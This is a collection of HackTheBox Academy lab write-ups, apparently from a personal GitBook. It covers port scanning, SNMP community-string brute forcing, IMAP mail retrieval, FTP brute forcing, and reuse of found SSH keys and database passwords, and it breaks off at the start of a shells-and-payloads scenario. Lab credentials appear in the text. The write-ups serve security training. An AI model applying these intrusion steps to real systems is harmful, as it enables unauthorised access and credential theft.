# Table of Contents - [Whoami | FaresMorcy](#whoami-faresmorcy) - [Footprinting Labs | FaresMorcy](#footprinting-labs-faresmorcy) - [Lab - Easy | FaresMorcy](#lab-easy-faresmorcy) - [Shells & Payloads | FaresMorcy](#shells-payloads-faresmorcy) - [Lab - Medium | FaresMorcy](#lab-medium-faresmorcy) - [Lab - Hard | FaresMorcy](#lab-hard-faresmorcy) - [Password Attacks | FaresMorcy](#password-attacks-faresmorcy) - [Lab - Easy | FaresMorcy](#lab-easy-faresmorcy) - [Active Directory Enumeration & Attacks | FaresMorcy](#active-directory-enumeration-attacks-faresmorcy) - [The Live Engagement | FaresMorcy](#the-live-engagement-faresmorcy) - [Lab - Medium | FaresMorcy](#lab-medium-faresmorcy) - [SOC Hackthebox Notes & Labs | FaresMorcy](#soc-hackthebox-notes-labs-faresmorcy) - [Lab - Hard | FaresMorcy](#lab-hard-faresmorcy) - [AD Enumeration & Attacks - Skills Assessment Part I | FaresMorcy](#ad-enumeration-attacks-skills-assessment-part-i-faresmorcy) - [Understanding Log Sources & Investigating with Splunk Module | FaresMorcy](#understanding-log-sources-investigating-with-splunk-module-faresmorcy) - [AD Enumeration & Attacks - Skills Assessment Part II | FaresMorcy](#ad-enumeration-attacks-skills-assessment-part-ii-faresmorcy) --- # Whoami | FaresMorcy Hi, I’m Fares Morcy, a Cybersecurity Engineer at [CyberDefenders](https://cyberdefenders.org/) , where I focus on adversary emulation and simulating real-world APT group operations to help analysts enhance their threat-hunting and incident response skills. At CyberDefenders, I design and develop realistic lab environments that mirror real attack scenarios, allowing learners to experience the attacker’s perspective and strengthen their defensive capabilities. I’m passionate about both the offensive and defensive sides of cybersecurity, understanding how attacks work and how to stop them. Linkedin: [https://www.linkedin.com/in/fares-morcy-5564721a9/](https://www.linkedin.com/in/fares-morcy-5564721a9/) [NextFootprinting Labs](https://faresbltagy.gitbook.io/footprintinglabs/footprinting-labs) Last updated 2 months ago --- # Footprinting Labs | FaresMorcy [Lab - Easy](https://faresbltagy.gitbook.io/footprintinglabs/footprinting-labs/lab-easy) [Lab - Medium](https://faresbltagy.gitbook.io/footprintinglabs/footprinting-labs/lab-medium) [Lab - Hard](https://faresbltagy.gitbook.io/footprintinglabs/footprinting-labs/lab-hard) [PreviousWhoami](https://faresbltagy.gitbook.io/footprintinglabs) [NextLab - Easy](https://faresbltagy.gitbook.io/footprintinglabs/footprinting-labs/lab-easy) --- # Lab - Easy | FaresMorcy [](https://faresbltagy.gitbook.io/footprintinglabs/footprinting-labs/lab-easy#df44) Now Let’s Begin 🚀 ----------------------------------------------------------------------------------------------------------- [](https://faresbltagy.gitbook.io/footprintinglabs/footprinting-labs/lab-easy#lab-easy) Lab - Easy ------------------------------------------------------------------------------------------------------- Let's start with the initial lab, the easy one. We'll commence by conducting reconnaissance. ### [](https://faresbltagy.gitbook.io/footprintinglabs/footprinting-labs/lab-easy#recon) Recon Now let's do some information gathering, we need to find out which ports are open. In order to do this, we need to use nmap. ![](https://faresbltagy.gitbook.io/footprintinglabs/~gitbook/image?url=https%3A%2F%2F2537271824-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FIswWWP3l0rGuQmG2WUcr%252Fuploads%252F2ZeL0q9ngsLI4YO6mAuQ%252FScreenshot.png%3Falt%3Dmedia%26token%3Dbbd491ab-3db5-41d1-a3de-6e71ef2a303e&width=768&dpr=4&quality=100&sign=d0dbad37&sv=2) nmap scan Following the nmap scan, we have identified four open ports. Now, let's proceed to investigate and interact with each of them. We possess login information obtained from the lab description 'ceil:qwer1234'. I attempted to access via SSH, yet encountered an authentication failure. Let's attempt to utilize these login details to gain access through the FTP servers on ports 21 and 2121. ![](https://faresbltagy.gitbook.io/footprintinglabs/~gitbook/image?url=https%3A%2F%2F2537271824-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FIswWWP3l0rGuQmG2WUcr%252Fuploads%252FY8S8Hgo3WMba3tM6QclL%252FScreenshot%282%29.png%3Falt%3Dmedia%26token%3D551a4fa6-a56d-46b6-bcfd-0639ceab724f&width=768&dpr=4&quality=100&sign=ae77b0de&sv=2) Port 21 was empty, therefore, let's attempt to connect to the FTP service on port 2121. I have located the private key belonging to the user named 'ceil'. Let us now attempt to establish an SSH connection using this file. ![](https://faresbltagy.gitbook.io/footprintinglabs/~gitbook/image?url=https%3A%2F%2F2537271824-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FIswWWP3l0rGuQmG2WUcr%252Fuploads%252FF8AhFTbGabVblOX1iyDX%252FScreenshot%284%29.png%3Falt%3Dmedia%26token%3D4670c0a1-c9ae-4e95-a2cc-0c7267923c0e&width=768&dpr=4&quality=100&sign=448854dc&sv=2) Begin by adjusting the file's permissions to 600. Subsequently, attempt to establish an SSH connection. Upon success, we will have gained access. Now, let's obtain the flag to successfully complete the lab. ![](https://faresbltagy.gitbook.io/footprintinglabs/~gitbook/image?url=https%3A%2F%2F2537271824-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FIswWWP3l0rGuQmG2WUcr%252Fuploads%252F2QYukHPUKiQKst5QAL3v%252FScreenshot%285%29.png%3Falt%3Dmedia%26token%3Dbf6244cc-0121-4924-8c53-eff5b44d7774&width=768&dpr=4&quality=100&sign=b55ec34&sv=2) [PreviousFootprinting Labs](https://faresbltagy.gitbook.io/footprintinglabs/footprinting-labs) [NextLab - Medium](https://faresbltagy.gitbook.io/footprintinglabs/footprinting-labs/lab-medium) Last updated 1 year ago * [Now Let’s Begin 🚀](https://faresbltagy.gitbook.io/footprintinglabs/footprinting-labs/lab-easy#df44) * [Lab - Easy](https://faresbltagy.gitbook.io/footprintinglabs/footprinting-labs/lab-easy#lab-easy) * [Recon](https://faresbltagy.gitbook.io/footprintinglabs/footprinting-labs/lab-easy#recon) --- # Shells & Payloads | FaresMorcy [The Live Engagement](https://faresbltagy.gitbook.io/footprintinglabs/shells-and-payloads/the-live-engagement) [PreviousLab - Hard](https://faresbltagy.gitbook.io/footprintinglabs/footprinting-labs/lab-hard) [NextThe Live Engagement](https://faresbltagy.gitbook.io/footprintinglabs/shells-and-payloads/the-live-engagement) --- # Lab - Medium | FaresMorcy [](https://faresbltagy.gitbook.io/footprintinglabs/footprinting-labs/lab-medium#let-us-commence) Let us commence 🚀 ------------------------------------------------------------------------------------------------------------------------ [](https://faresbltagy.gitbook.io/footprintinglabs/footprinting-labs/lab-medium#lab-medium) Lab - Medium ------------------------------------------------------------------------------------------------------------- First, we'll begin with reconnaissance to identify open ports. ![](https://faresbltagy.gitbook.io/footprintinglabs/~gitbook/image?url=https%3A%2F%2F2537271824-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FIswWWP3l0rGuQmG2WUcr%252Fuploads%252FkguAZWp8sjp2qLHR0ObO%252FScreenshot.png%3Falt%3Dmedia%26token%3Ddd1f3a18-a859-4013-b90c-7ecf5ac3766a&width=768&dpr=4&quality=100&sign=d05360b0&sv=2) nmap scan After conducting the nmap scan, we've discovered several open ports. Let's now proceed to examine and engage with each one. Port 2049 is accessible; let's explore the NFS server to discover potential opportunities. **NFS** is a system designed for **client/server** that enables users to seamlessly access files over a network as though these files were located within a local directory. ![](https://faresbltagy.gitbook.io/footprintinglabs/~gitbook/image?url=https%3A%2F%2F2537271824-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FIswWWP3l0rGuQmG2WUcr%252Fuploads%252FW5drH4Ag12lmfq2QQd5V%252FScreenshot%281%29.png%3Falt%3Dmedia%26token%3Dfd1f09e2-84b6-4024-8331-b2b9ee2b4f47&width=768&dpr=4&quality=100&sign=3729592d&sv=2) Here, I attempted to enumerate available shares using "showmount" and discovered the directory named "TechSupport". Let's explore its contents. ![](https://faresbltagy.gitbook.io/footprintinglabs/~gitbook/image?url=https%3A%2F%2F2537271824-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FIswWWP3l0rGuQmG2WUcr%252Fuploads%252Fyc5eOQTjEyDhablsseKL%252FScreenshot%282%29.png%3Falt%3Dmedia%26token%3D8cc893ce-7c87-48d8-8ce9-c54235b9cf84&width=768&dpr=4&quality=100&sign=df14d54d&sv=2) I discovered several tickets, most of which were empty except for one. Let's examine its contents." ![](https://faresbltagy.gitbook.io/footprintinglabs/~gitbook/image?url=https%3A%2F%2F2537271824-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FIswWWP3l0rGuQmG2WUcr%252Fuploads%252FnsjQEGYpPZ05EFM9Mo5x%252FScreenshot%283%29.png%3Falt%3Dmedia%26token%3D84bb3098-7db3-4621-a076-f679298500bf&width=768&dpr=4&quality=100&sign=6a63a366&sv=2) I discovered an email containing credentials for a user named 'Alex' along with the corresponding Operator. Let's attempt to establish a connection via the RDP server to explore further possibilities. ![](https://faresbltagy.gitbook.io/footprintinglabs/~gitbook/image?url=https%3A%2F%2F2537271824-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FIswWWP3l0rGuQmG2WUcr%252Fuploads%252FfATDkLUwZ8lgAoNHRDND%252FScreenshot%284%29.png%3Falt%3Dmedia%26token%3Db253bf23-f7e7-4697-80f9-28aa3234330a&width=768&dpr=4&quality=100&sign=7a58cf53&sv=2) I have gained access to the target via RDP using Remmina. Feel free to utilize any tool of your preference. Let's explore the possibilities. ![](https://faresbltagy.gitbook.io/footprintinglabs/~gitbook/image?url=https%3A%2F%2F2537271824-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FIswWWP3l0rGuQmG2WUcr%252Fuploads%252FkaswzFs8MFJWIYVueOHk%252FScreenshot%285%29.png%3Falt%3Dmedia%26token%3Da063240c-f8fe-4f46-b5ac-e54d816f9e7d&width=768&dpr=4&quality=100&sign=af2bb423&sv=2) I conducted enumeration on the target and discovered a file titled "important.txt" within a directory labeled "devshare," yielding credentials for a user named "sa". Upon gaining access to the target through RDP, I found a Microsoft SQL Server. Let's attempt to access it using the credentials we've obtained. ![](https://faresbltagy.gitbook.io/footprintinglabs/~gitbook/image?url=https%3A%2F%2F2537271824-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FIswWWP3l0rGuQmG2WUcr%252Fuploads%252FYdC0K68YXGnQXe7qNS1F%252FScreenshot%286%29.png%3Falt%3Dmedia%26token%3D2962729e-4ed1-4c06-893d-a683c6a9a50b&width=768&dpr=4&quality=100&sign=ed498345&sv=2) When attempting to access the Microsoft SQL Server with the provided credentials, an error occurred, preventing successful login. Let's now attempt to access the Microsoft SQL Server with administrative privileges. ![](https://faresbltagy.gitbook.io/footprintinglabs/~gitbook/image?url=https%3A%2F%2F2537271824-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FIswWWP3l0rGuQmG2WUcr%252Fuploads%252FiEevyJUFPMWuJmcLSqk5%252FScreenshot%287%29.png%3Falt%3Dmedia%26token%3D3b2ef29a-3b69-4705-be01-2ca5064cf114&width=768&dpr=4&quality=100&sign=f30a3da7&sv=2) Right Click + Run as administrator I initiated the Microsoft SQL Server application by right-clicking and selecting 'Run as Administrator.' Upon entering the password and confirming with 'Yes,' the application successfully launched, allowing me to establish a connection. ![](https://faresbltagy.gitbook.io/footprintinglabs/~gitbook/image?url=https%3A%2F%2F2537271824-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FIswWWP3l0rGuQmG2WUcr%252Fuploads%252Fdq8vFKQ38y3q56t2kSoV%252FScreenshot%288%29.png%3Falt%3Dmedia%26token%3D88542997-9834-4de6-88c1-a3704b38a55c&width=768&dpr=4&quality=100&sign=5f67c582&sv=2) Let's proceed to generate a new query to retrieve the password for the user "HTB." ![](https://faresbltagy.gitbook.io/footprintinglabs/~gitbook/image?url=https%3A%2F%2F2537271824-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FIswWWP3l0rGuQmG2WUcr%252Fuploads%252FRsoZXdGfnP112ggUo3zv%252FScreenshot%289%29.png%3Falt%3Dmedia%26token%3D3cb2ea4b-0c7d-4bcf-8f10-64d5f8a12edc&width=768&dpr=4&quality=100&sign=cfe8852c&sv=2) SELECT \* FROM accounts.dbo.devsacc where name = 'HTB' We have successfully obtained the password for the user 'HTB' and completed the lab. Thank you for taking the time to read this write-up [PreviousLab - Easy](https://faresbltagy.gitbook.io/footprintinglabs/footprinting-labs/lab-easy) [NextLab - Hard](https://faresbltagy.gitbook.io/footprintinglabs/footprinting-labs/lab-hard) Last updated 1 year ago * [Let us commence 🚀](https://faresbltagy.gitbook.io/footprintinglabs/footprinting-labs/lab-medium#let-us-commence) * [Lab - Medium](https://faresbltagy.gitbook.io/footprintinglabs/footprinting-labs/lab-medium#lab-medium) --- # Lab - Hard | FaresMorcy [](https://faresbltagy.gitbook.io/footprintinglabs/footprinting-labs/lab-hard#df44) Now Let’s Begin 🚀 ----------------------------------------------------------------------------------------------------------- [](https://faresbltagy.gitbook.io/footprintinglabs/footprinting-labs/lab-hard#lab-easy) Lab -Hard ------------------------------------------------------------------------------------------------------ Initially, we'll conduct reconnaissance to detect open ports. This involves performing TCP and UDP port scans to identify all available open ports. ![](https://faresbltagy.gitbook.io/footprintinglabs/~gitbook/image?url=https%3A%2F%2F2537271824-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FIswWWP3l0rGuQmG2WUcr%252Fuploads%252Fob6ac7OlaFxvfaCrzWa1%252FScreenshot.png%3Falt%3Dmedia%26token%3D732d1336-fdde-47d7-8fcb-34a2c4929c41&width=768&dpr=4&quality=100&sign=b6836132&sv=2) TCP Port Scan ![](https://faresbltagy.gitbook.io/footprintinglabs/~gitbook/image?url=https%3A%2F%2F2537271824-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FIswWWP3l0rGuQmG2WUcr%252Fuploads%252FlGKPoatjA4dJassNCJ2Q%252FScreenshot%281%29.png%3Falt%3Dmedia%26token%3D69fa6bcd-679d-463a-a531-a0b8531dc653&width=768&dpr=4&quality=100&sign=2c2521f5&sv=2) UDP Port Scan Here are the open ports detected following a scan of TCP and UDP ports. I attempted to experiment with the IMAP and POP3 services, but unfortunately encountered no success. Let's now investigate the UDP services to determine potential findings. UDP Port 161 is accessible, indicating the presence of an SNMP service. **SNMP - Simple Network Management Protocol** is a protocol used to monitor different devices in the network (like routers, switches, printers, IoTs...). For footprinting SNMP, we can use tools like `snmpwalk`, `onesixtyone`, and `braa`. `Snmpwalk` is used to query the OIDs with their information. `Onesixtyone` can be used to brute-force the names of the community strings since they can be named arbitrarily by the administrator. Since these community strings can be bound to any source, identifying the existing community strings can take quite some time. I attempted to utilize snmpwalk, but encountered no response. ![](https://faresbltagy.gitbook.io/footprintinglabs/~gitbook/image?url=https%3A%2F%2F2537271824-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FIswWWP3l0rGuQmG2WUcr%252Fuploads%252FjU7PiC8XwXJ23lYlyUM4%252FScreenshot%282%29.png%3Falt%3Dmedia%26token%3D91c99f78-a30a-4258-8cf8-4396116ab789&width=768&dpr=4&quality=100&sign=9eedbe3c&sv=2) Now I don't know the community string, so I used `**onesixtyone**`tool and `**Seclists**`wordlists to identify these community strings. In order to access the information saved on the **MIB** you need to know the community string on versions 1 and 2/2c and the credentials on version 3. The are 2 types of community strings: * `**public**` mainly **read only** functions * `**private**` **Read/Write** in general ![](https://faresbltagy.gitbook.io/footprintinglabs/~gitbook/image?url=https%3A%2F%2F2537271824-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FIswWWP3l0rGuQmG2WUcr%252Fuploads%252FtMkr7OThxBa9QTwtuX1s%252FScreenshot%283%29.png%3Falt%3Dmedia%26token%3D8938c076-dfa1-47bc-a72b-606708b512d3&width=768&dpr=4&quality=100&sign=495cd954&sv=2) I discovered a community string, which is enclosed within the brackets \[\]. Let's utilize this community string with the braa tool to explore the available information. ![](https://faresbltagy.gitbook.io/footprintinglabs/~gitbook/image?url=https%3A%2F%2F2537271824-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FIswWWP3l0rGuQmG2WUcr%252Fuploads%252Fz8HTJqceRqTgXkNG0jOc%252FScreenshot%284%29.png%3Falt%3Dmedia%26token%3De89e1f8c-e834-4a37-ada5-0c8d0970d81f&width=768&dpr=4&quality=100&sign=63e45be4&sv=2) After employing Braa with the discovered community string, I obtained credentials for a user named 'Tom'. Let's attempt to utilize these credentials with IMAP to ascertain the available data. ![](https://faresbltagy.gitbook.io/footprintinglabs/~gitbook/image?url=https%3A%2F%2F2537271824-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FIswWWP3l0rGuQmG2WUcr%252Fuploads%252FM3nqvIZvM6D53IhFdtwQ%252FScreenshot%285%29.png%3Falt%3Dmedia%26token%3Dec55c572-1a0f-49dc-9ae9-cddfa7a36b48&width=768&dpr=4&quality=100&sign=f6df939b&sv=2) Here's what I've accomplished: 1. Logged in with the command`**LOGIN username password**` 2. Listed all directories using`**LIST "" ***` 3. Selected the 'INBOX' mailbox with `**SELECT "INBOX"**` 4. Checked for available messages with `**1 STATUS INBOX (MESSAGES)**` and found one 5. Retrieved the entire message with `**1 FETCH 1 all**` 6. Obtained the message content using `**1 FETCH 1 BODY[]**` ![](https://faresbltagy.gitbook.io/footprintinglabs/~gitbook/image?url=https%3A%2F%2F2537271824-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FIswWWP3l0rGuQmG2WUcr%252Fuploads%252F2EawNKkgIMAfrutoD5XX%252FScreenshot%287%29.png%3Falt%3Dmedia%26token%3Df1dfd5c1-83e3-496e-aff3-19e411a09e99&width=768&dpr=4&quality=100&sign=c194ac30&sv=2) I discovered a private key associated with the user 'Tom' in the message. Let's attempt to SSH using this key. ![](https://faresbltagy.gitbook.io/footprintinglabs/~gitbook/image?url=https%3A%2F%2F2537271824-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FIswWWP3l0rGuQmG2WUcr%252Fuploads%252FoEbJp7sab74th8Ix15ox%252FScreenshot%288%29.png%3Falt%3Dmedia%26token%3D18a8d80c-82e9-42c0-ba88-12e73aa9b843&width=768&dpr=4&quality=100&sign=b4b1ae45&sv=2) I saved the private key as `id_rsa` and adjusted its permissions before using SSH to gain access to the target. After conducting enumeration, I compiled a list of all files within the current directory belonging to the user 'tom.' Subsequently, I examined the`.bash_history` file and discovered the presence of a MySQL command within it. ![](https://faresbltagy.gitbook.io/footprintinglabs/~gitbook/image?url=https%3A%2F%2F2537271824-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FIswWWP3l0rGuQmG2WUcr%252Fuploads%252F9dN0f3kIj1LBx8Dr51h0%252FScreenshot%289%29.png%3Falt%3Dmedia%26token%3D00cb93a5-417b-4438-9859-ef672490143c&width=768&dpr=4&quality=100&sign=9c7d13bb&sv=2) ![](https://faresbltagy.gitbook.io/footprintinglabs/~gitbook/image?url=https%3A%2F%2F2537271824-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FIswWWP3l0rGuQmG2WUcr%252Fuploads%252FkI4h9VuoI8pEv2Tz7kK1%252FScreenshot%2810%29.png%3Falt%3Dmedia%26token%3D651ca57c-7359-47ec-8df9-e16271cfbe8e&width=768&dpr=4&quality=100&sign=1120bb9c&sv=2) Let's attempt to access MySQL by entering the command `**mysql -u tom -p**`, utilizing the previously discovered password for the user 'Tom'. ![](https://faresbltagy.gitbook.io/footprintinglabs/~gitbook/image?url=https%3A%2F%2F2537271824-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FIswWWP3l0rGuQmG2WUcr%252Fuploads%252FHDtf45m5CNBQBTHn92Wj%252FScreenshot%2811%29.png%3Falt%3Dmedia%26token%3Dc04be76f-ede2-4288-99c7-728a75c432e8&width=768&dpr=4&quality=100&sign=2fb3a031&sv=2) Upon logging in, I discovered a database named `**users**`containing a table labeled as such. I proceeded to extract a comprehensive list of all columns within the `**users**` table, ultimately obtaining the password associated with the `**HTB**` user. We have successfully completed the lab. Thank you for taking the time to read this write-up; your attention is greatly appreciated. [PreviousLab - Medium](https://faresbltagy.gitbook.io/footprintinglabs/footprinting-labs/lab-medium) [NextShells & Payloads](https://faresbltagy.gitbook.io/footprintinglabs/shells-and-payloads) Last updated 1 year ago * [Now Let’s Begin 🚀](https://faresbltagy.gitbook.io/footprintinglabs/footprinting-labs/lab-hard#df44) * [Lab -Hard](https://faresbltagy.gitbook.io/footprintinglabs/footprinting-labs/lab-hard#lab-easy) --- # Password Attacks | FaresMorcy [Lab - Easy](https://faresbltagy.gitbook.io/footprintinglabs/password-attacks/lab-easy) [Lab - Medium](https://faresbltagy.gitbook.io/footprintinglabs/password-attacks/lab-medium) [Lab - Hard](https://faresbltagy.gitbook.io/footprintinglabs/password-attacks/lab-hard) [PreviousThe Live Engagement](https://faresbltagy.gitbook.io/footprintinglabs/shells-and-payloads/the-live-engagement) [NextLab - Easy](https://faresbltagy.gitbook.io/footprintinglabs/password-attacks/lab-easy) --- # Lab - Easy | FaresMorcy [](https://faresbltagy.gitbook.io/footprintinglabs/password-attacks/lab-easy#recon) Recon ---------------------------------------------------------------------------------------------- First, let's initiate an IP scan to identify open ports, thereby enabling us to assess available options. ![](https://faresbltagy.gitbook.io/footprintinglabs/~gitbook/image?url=https%3A%2F%2F2537271824-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FIswWWP3l0rGuQmG2WUcr%252Fuploads%252F1KK7zg5tlZO16i9wfgk6%252FScreenshot%281%29.png%3Falt%3Dmedia%26token%3D7009d067-3978-427b-9501-d465b790fbfe&width=768&dpr=4&quality=100&sign=d2c181e2&sv=2) I discovered that ports 21 and 22 are open. Let's attempt a brute force attack; perhaps we can obtain valid credentials. ![](https://faresbltagy.gitbook.io/footprintinglabs/~gitbook/image?url=https%3A%2F%2F2537271824-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FIswWWP3l0rGuQmG2WUcr%252Fuploads%252FZEmlGItAnMm6Ez2UkjVd%252FScreenshot%282%29.png%3Falt%3Dmedia%26token%3D51d22f43-f1a6-43d2-a474-9311235ca81e&width=768&dpr=4&quality=100&sign=241ae590&sv=2) I discovered valid credentials while brute-forcing FTP. Let's attempt to log in using FTP and explore the available data. ![](https://faresbltagy.gitbook.io/footprintinglabs/~gitbook/image?url=https%3A%2F%2F2537271824-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FIswWWP3l0rGuQmG2WUcr%252Fuploads%252FMatj6xPQjsYVYFuFtm9n%252FScreenshot%283%29.png%3Falt%3Dmedia%26token%3D626c8d8f-34ff-453a-915f-a96b5f1d18f1&width=768&dpr=4&quality=100&sign=5ab68afc&sv=2) Upon logging in, I discovered a private key named id\_rsa. Let's proceed by transferring it to our machine and adjusting its permissions in an attempt to establish an SSH connection. ![](https://faresbltagy.gitbook.io/footprintinglabs/~gitbook/image?url=https%3A%2F%2F2537271824-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FIswWWP3l0rGuQmG2WUcr%252Fuploads%252FhgpgTgV5wz92aogXF2j5%252FScreenshot%284%29.png%3Falt%3Dmedia%26token%3Da53751a4-2cb8-4dbb-af30-0b4ab9ce2fa4&width=768&dpr=4&quality=100&sign=3b8ca11b&sv=2) Upon logging in, I conducted enumeration and successfully discovered the root password. Thank you for your time in reviewing this writeup. ![](https://faresbltagy.gitbook.io/footprintinglabs/~gitbook/image?url=https%3A%2F%2F2537271824-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FIswWWP3l0rGuQmG2WUcr%252Fuploads%252F4kvjbtQ6ORGMsl3cdByS%252FScreenshot%286%29.png%3Falt%3Dmedia%26token%3D8b787550-0d08-4905-b29c-f8360643376a&width=768&dpr=4&quality=100&sign=da22afc9&sv=2) [PreviousPassword Attacks](https://faresbltagy.gitbook.io/footprintinglabs/password-attacks) [NextLab - Medium](https://faresbltagy.gitbook.io/footprintinglabs/password-attacks/lab-medium) Last updated 1 year ago --- # Active Directory Enumeration & Attacks | FaresMorcy [Active Directory Enumeration & Attacks](https://faresbltagy.gitbook.io/footprintinglabs/active-directory-enumeration-and-attacks/active-directory-enumeration-and-attacks) [AD Enumeration & Attacks - Skills Assessment Part I](https://faresbltagy.gitbook.io/footprintinglabs/active-directory-enumeration-and-attacks/ad-enumeration-and-attacks-skills-assessment-part-i) [AD Enumeration & Attacks - Skills Assessment Part II](https://faresbltagy.gitbook.io/footprintinglabs/active-directory-enumeration-and-attacks/ad-enumeration-and-attacks-skills-assessment-part-ii) [PreviousLab - Hard](https://faresbltagy.gitbook.io/footprintinglabs/password-attacks/lab-hard) [NextActive Directory Enumeration & Attacks](https://faresbltagy.gitbook.io/footprintinglabs/active-directory-enumeration-and-attacks/active-directory-enumeration-and-attacks) --- # The Live Engagement | FaresMorcy [](https://faresbltagy.gitbook.io/footprintinglabs/shells-and-payloads/the-live-engagement#df44) Now Let’s Begin 🚀 ------------------------------------------------------------------------------------------------------------------------ [](https://faresbltagy.gitbook.io/footprintinglabs/shells-and-payloads/the-live-engagement#scenario) Scenario: ------------------------------------------------------------------------------------------------------------------- CAT5's team has secured a foothold into Inlanefrieght's network for us. Our responsibility is to examine the results from the recon that was run, validate any info we deem necessary, research what can be seen, and choose which exploit, payloads, and shells will be used to control the targets [](https://faresbltagy.gitbook.io/footprintinglabs/shells-and-payloads/the-live-engagement#objectives) Objectives: ----------------------------------------------------------------------------------------------------------------------- * Demonstrate your knowledge of exploiting and receiving an interactive shell from a `Windows host or server`. * Demonstrate your knowledge of exploiting and receiving an interactive shell from a `Linux host or server`. * Demonstrate your knowledge of exploiting and receiving an interactive shell from a `Web application`. * Demonstrate your ability to identify the `shell environment` you have access to as a user on the victim host. [](https://faresbltagy.gitbook.io/footprintinglabs/shells-and-payloads/the-live-engagement#credentials) Credentials ------------------------------------------------------------------------------------------------------------------------ The credentials we need for a foothold: `**htb-student**` / `**HTB_@cademy_stdnt!**` [](https://faresbltagy.gitbook.io/footprintinglabs/shells-and-payloads/the-live-engagement#targets) Targets ---------------------------------------------------------------------------------------------------------------- Host-01: 172.16.1.11 Host-02: blog.inlanefreight.local Host-03: 172.16.1.13 ![](https://faresbltagy.gitbook.io/footprintinglabs/~gitbook/image?url=https%3A%2F%2F2537271824-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FIswWWP3l0rGuQmG2WUcr%252Fuploads%252FISBxW4YXF6pO4IbPI66u%252FScreenshot.png%3Falt%3Dmedia%26token%3Da8656bc6-3008-4a9c-bfbb-f48f1913964b&width=768&dpr=4&quality=100&sign=9201ada9&sv=2) Initially, I established a connection utilizing xfreerdp with the provided credentials. ![](https://faresbltagy.gitbook.io/footprintinglabs/~gitbook/image?url=https%3A%2F%2F2537271824-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FIswWWP3l0rGuQmG2WUcr%252Fuploads%252FrGseOHKKscdh6XqfZ99s%252FScreenshot%281%29.png%3Falt%3Dmedia%26token%3Dbc22d34d-04a4-484b-ab10-067c55fb5915&width=768&dpr=4&quality=100&sign=b4830702&sv=2) After establishing initial access with xfreerdp, I employed nmap to conduct a port scan on Host-01, revealing several open ports. ![](https://faresbltagy.gitbook.io/footprintinglabs/~gitbook/image?url=https%3A%2F%2F2537271824-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FIswWWP3l0rGuQmG2WUcr%252Fuploads%252FMxkVozU3Tt45q8XvLMpZ%252FScreenshot%282%29.png%3Falt%3Dmedia%26token%3Dd263a7b0-aa33-4a05-abbe-f802d38ec887&width=768&dpr=4&quality=100&sign=3e150ad5&sv=2) 1) What is the hostname of Host-1? **shells-winsvr** I visited 